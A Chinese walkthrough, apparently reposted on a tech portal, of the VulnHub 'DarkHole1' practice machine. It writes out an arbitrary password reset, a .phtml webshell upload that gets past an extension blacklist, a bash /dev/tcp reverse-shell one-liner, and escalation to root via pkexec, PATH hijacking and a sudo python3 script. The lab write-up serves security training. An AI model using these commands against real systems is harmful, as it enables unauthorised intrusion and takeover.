IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 游戏开发 -> 靶场练习 NO.26 DarkHole1 任意账号重置登录管理员账号,phtml特殊后缀解析上传成功,pkexec提权或者修改环境变量伪造id命令为bash+sudo -> 正文阅读

[游戏开发]靶场练习 NO.26 DarkHole1 任意账号重置登录管理员账号,phtml特殊后缀解析上传成功,pkexec提权或者修改环境变量伪造id命令为bash+sudo

0x00 环境准备

  • 下载链接

      https://download.vulnhub.com/darkhole/DarkHole.zip
    
  • 靶机描述
    Description
    Back to the Top
    Difficulty: Easy

    It’s a box for beginners, but not easy, Good Luck

    Hint: Don’t waste your time For Brute-Force

  • 启动方式
    VM 启动

0x01 信息收集

步骤一: ip探测

nmap -sP 192.168.56.0/24

在这里插入图片描述
锁定173

步骤二:端口服务识别

nmap -sC -sV -A -p- -o port.txt 192.168.157.173
Nmap scan report for 192.168.157.173
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e4:50:d9:50:5d:91:30:50:e9:b5:7d:ca:b0:51:db:74 (RSA)
|   256 73:0c:76:86:60:63:06:00:21:c2:36:20:3b:99:c1:f7 (ECDSA)
|_  256 54:53:4c:3f:4f:3a:26:f6:02:aa:9a:24:ea:1b:92:8c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
MAC Address: 00:0C:29:09:B9:BA (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.157.173

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar  8 16:00:19 2022 -- 1 IP address (1 host up) scanned in 17.99 seconds

0x02 漏洞探测

步骤一:80端口探测

在这里插入图片描述
右上角有登陆点 可以注册

步骤二:注册后登录后台测漏洞

注册 123456 123456

在这里插入图片描述
看起来有可能的有三个点 6个洞
url处的 sql注入 修改id 未授权访问其他用户信息
个人信息处的 sql注入 和xss
change password 处的 重置任意账号密码

步骤三:测试上述漏洞

任意账号密码重置

抓包 修改id为1的账号密码为123成功
在这里插入图片描述
其余漏洞 测试

步骤四:登录id为1的账号(应该为管理员)

猜测账号为 admin root 之类的
admin 123 登录成功

在这里插入图片描述
存在一处上传点 上传 木马 连接webshell

步骤五:上传php木马(失败,黑名单)

(1)上传php尝试

在这里插入图片描述
说只能上传 jpg png 等等图片的

(2)上传.txt .aaa尝试

在这里插入图片描述
在这里插入图片描述

上传成功 说明 不是白名单验证 ,是黑名单验证

步骤六:尝试黑名单绕过

(1)确定信息

中间件 Apache/2.4.41 (Ubuntu)
语言 php 版本未知
linux 服务器 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5

(2)尝试apache多后缀解析(失败)

上传成功解析失败
在这里插入图片描述

(3)尝试.htaccess(失败)

.htaccess
文件内容如下

SetHandler application/x-httpd-php 

所有文件都会当成php来解析

在这里插入图片描述

又上传了一个 php马的 shell.txt 访问 没有解析

(4) PHP大写绕过(上传成功,不解析)

在这里插入图片描述
在这里插入图片描述

(5)php其余后缀(phtml解析成功)

php2,php3,php5,phtml

还好没放弃, 测试到最后 phtml 解析成功
在这里插入图片描述

步骤七:上传webshell(蚁剑连接成功)

在这里插入图片描述

步骤八:反弹shell(网站权限)

bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/9897 <&1'

在这里插入图片描述

步骤九:切换为完整终端

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm 然后 Ctrl+Z 退出来一下
stty raw -echo;fg 回车后输入 reset 再回车

0x03 提权

步骤一:信息收集

在这里插入图片描述
john
darkhole
root

步骤二:suid 信息收集

find / -user root -perm -4000 -print 2>/dev/null
在这里插入图片描述
可以尝试pkexec提权

步骤三:pkexec提权(root成功)

在这里插入图片描述
在这里插入图片描述

步骤四:另一种提权

(1)发现执行id命令的文件toto

因为john目录下有个toto文件有可执行权限 执行后执行id命令

(2)伪造id 可执行程序内容为bash 命令的

想办法修改环境变量
在这里插入图片描述

(3)再次执行toto程序 提权至john用户

在这里插入图片描述
发现成功以john 用户 执行bash命令成功
在这里插入图片描述
发现 password 应该为某个账号的密码
测试后为 john的

(4)sudo -l

sudo -l 列出当前用户john可执行的命令和无法执行的命令
密码为 root 123
在这里插入图片描述

显示john用户 可以运行一下命令 以root权限
(root) /usr/bin/python3 /home/john/file.py

因此 可以修改文件内容 python执行系统命令 /bin/bash反弹shell

(5)提权至root成功

echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py 	

在这里插入图片描述

0x04 总结

注册登录到后台 任意账号重置修改密码
管理员账号 存在上传功能黑名单验证
phtml 上传成功 并且解析
pkexec提权

  游戏开发 最新文章
6、英飞凌-AURIX-TC3XX: PWM实验之使用 GT
泛型自动装箱
CubeMax添加Rtthread操作系统 组件STM32F10
python多线程编程:如何优雅地关闭线程
数据类型隐式转换导致的阻塞
WebAPi实现多文件上传,并附带参数
from origin ‘null‘ has been blocked by
UE4 蓝图调用C++函数(附带项目工程)
Unity学习笔记(一)结构体的简单理解与应用
【Memory As a Programming Concept in C a
上一篇文章      下一篇文章      查看所有文章
加:2022-03-11 22:32:23  更:2022-03-11 22:33:17 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/27 14:37:58-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码